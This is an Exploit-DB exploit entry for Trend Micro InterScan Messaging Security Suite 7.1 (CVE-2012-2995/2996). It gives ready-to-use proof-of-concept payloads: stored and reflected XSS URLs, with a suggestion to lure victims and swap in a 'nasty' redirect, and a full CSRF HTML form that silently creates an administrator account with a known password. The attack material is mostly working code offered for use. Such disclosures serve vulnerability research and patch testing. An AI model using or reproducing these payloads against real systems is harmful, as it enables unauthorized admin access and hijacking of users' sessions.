Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery

EDB-ID:

21319

CVE:

2012-2996 2012-2995

EDB Verified:

Author:

modpr0be

Type:

webapps

Exploit:   /  

Platform:

AIX

Date:

2012-09-14

Vulnerable App: 
# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996

# Software Description
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
# mail gateway security. Choose state-of-the-art software or a hybrid solution 
# with on-premise virtual appliance and optional cloud pre-filter that blocks 
# the vast majority of spam and malware outside your network. Plus our Data 
# Privacy and Encryption Module secure outbound data to ensure privacy and 
# regulatory compliance.

# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) 
# and cross-site request forgery (CWE-352) vulnerabilities.

# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services